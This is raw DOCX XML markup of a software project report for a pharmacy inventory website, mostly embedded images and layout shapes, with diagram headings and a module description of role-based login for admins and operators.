4Uf8I3pP/QNs/wDvwn+FH74PfI/+Eq0f&#10;/oMWP/gTH/jWHp+rWmofESX7JdwXGzSk3+RIH/5amug/4RzSv+gbZ/8AfhP8KsWWl2liH+zW0Vvu&#10;6+VGEzRyTnuL3y/RRRXS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NxsS&#10;s94AAAAGAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm92kmlhiNqUU9VQEW6H0&#10;Ns1Ok9DsbMhuk/Tfu3rRy4PhPd77Jl9OphUD9a6xrCCeRSCIS6sbrhR87d4eFiCcR9bYWiYFV3Kw&#10;LG5vcsy0HfmThq2vRChhl6GC2vsuk9KVNRl0M9sRB+9ke4M+nH0ldY9jKDetnEdRKg02HBZq7Ghd&#10;U3neXoyC9xHH1WP8OmzOp/X1sEs+9puYlLq/m1YvIDxN/i8MP/gBHYrAdLQX1k60CsIj/leDly6e&#10;ExDHEJqnyRPIIpf/8Ytv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6a52cMAMAAJAKAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItAAoAAAAAAAAAIQBgiZvZVHsAAFR7AAAUAAAAAAAAAAAAAAAAAJkFAABkcnMvbWVkaWEvaW1h&#10;Z2UxLmpwZ1BLAQItAAoAAAAAAAAAIQAjWsuSkoMAAJKDAAAUAAAAAAAAAAAAAAAAAB+BAABkcnMv&#10;bWVkaWEvaW1hZ2UyLmpwZ1BLAQItABQABgAIAAAAIQA3GxKz3gAAAAYBAAAPAAAAAAAAAAAAAAAA&#10;AOMEAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAe8A4ksMAAAClAQAAGQAAAAAAAAAA&#10;AAAAAADuBQEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABwAHAL4BAADoBgEAAAA=&#10;">
                <v:rect id="Rectangle 874" o:spid="_x0000_s1045" style="position:absolute;top:41768;width:9730;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27856A4D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t xml:space="preserve">               </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 876" o:spid="_x0000_s1046" style="position:absolute;left:40955;top:78607;width:650;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2ED8ECF1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 879" o:spid="_x0000_s1047" type="#_x0000_t75" style="position:absolute;left:7307;width:36346;height:4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IlxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvQr9DeIVeRLPrQe1qFBELvYj4p54fm+dmcfOybKKm394IhR6HmfkNM19G24g7db52rCAfZiCI&#10;S6drrhScjl+DKQgfkDU2jknBL3lYLt56cyy0e/Ce7odQiQRhX6ACE0JbSOlLQxb90LXEybu4zmJI&#10;squk7vCR4LaRoywbS4s1pwWDLa0NldfDzSqIpx3298fR1lx3od9W+U88b3KlPt7jagYiUAz/4b/2&#10;t1YwnXzC60w6AnLxBAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC6ckiXEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId23" o:title=""/>
                </v:shape>
                <v:shape id="Picture 881" o:spid="_x0000_s1048" type="#_x0000_t75" style="position:absolute;left:2;top:43052;width:40862;height:3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hGwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvC/6H8AQvi6b1sNRqFBEEr1Zl19ujebalzUtpolZ//UYQPA4z8w2zWPWmETfqXGVZQTyJQBDn&#10;VldcKDgetuMEhPPIGhvLpOBBDlbLwdcCU23vvKdb5gsRIOxSVFB636ZSurwkg25iW+LgXWxn0AfZ&#10;FVJ3eA9w08hpFP1IgxWHhRJb2pSU19nVKPg+6b99PNPnOpPVkw6/R7me1UqNhv16DsJT7z/hd3un&#10;FSRJDK8z4QjI5T8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAmGQYRsMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId24" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE714B7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="2290"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB56892" wp14:editId="4079A5F2">
            <wp:extent cx="4413377" cy="406273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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4413377" cy="4062730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B12A260" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBF3F3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15E006F7" wp14:editId="4E77E13C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41171" name="Group 4117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00" name="Shape 495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1" name="Shape 495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02" name="Shape 495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3" name="Shape 495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04" name="Shape 495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71" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49505" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49506" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49507" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49508" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4950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68089AC7" wp14:editId="2D26B849">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41172" name="Group 4117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10" name="Shape 495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1" name="Shape 495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12" name="Shape 495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3" name="Shape 495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14" name="Shape 495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72" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49515" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49516" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49517" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49518" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4951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6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">STATE CHART </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DIAGRAM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA7828" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417882E4" wp14:editId="47422B69">
            <wp:extent cx="5873750" cy="370586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26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5873750" cy="3705860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E0904A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230C4718" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CLASS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DIAGRAM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29101FE3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50883907" wp14:editId="1500B23D">
            <wp:extent cx="5873750" cy="4166235"/>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27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5873750" cy="4166235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA41BD5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56C288D4" wp14:editId="00080F7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41912" name="Group 4191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20" name="Shape 495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1" name="Shape 495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22" name="Shape 495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3" name="Shape 495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24" name="Shape 495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12" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49525" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49526" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49527" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49528" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4952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5046625B" wp14:editId="37382F40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41920" name="Group 4192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30" name="Shape 495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1" name="Shape 495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32" name="Shape 495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3" name="Shape 495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34" name="Shape 495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920" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49535" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49536" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49537" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49538" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4953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6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCA873" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A671719" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ACTIVITY </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DIAGRAM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDF352" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01798AD6" wp14:editId="2ECFEC64">
            <wp:extent cx="5873750" cy="3772535"/>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28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5873750" cy="3772535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C7770" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc48947"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MODULE DESCRIPTION: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6B9EFE0B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="71"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84DDA9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Login and User Management: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D388B5C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="78" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the main objectives of the product is to maintain separate interfaces for a different level of users. To implement this, we are implementing an authentication system where different levels of users can enter their own credentials to gain access of the product. The admin/supervisor has more access than the operator in terms of access to the product. The admin/supervisor can create multiple users for the operators as well as for other supervisors. The authentication system also makes sure that any person who doesn’t have the credentials to log in, cannot gain access to the pharmacy information and the database. This feature of the product is of high priority for security reasons. The website will prompt the user to enter his username and password. When the credentials are entered, the user enters into his own website interface. If the credentials are of the operator, then he is redirected to the Inventory display page or if the credentials are of the supervisor, then he is redirected to the admin page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4748FF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="16"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C85327" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory Adding: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2AC407" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="76" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
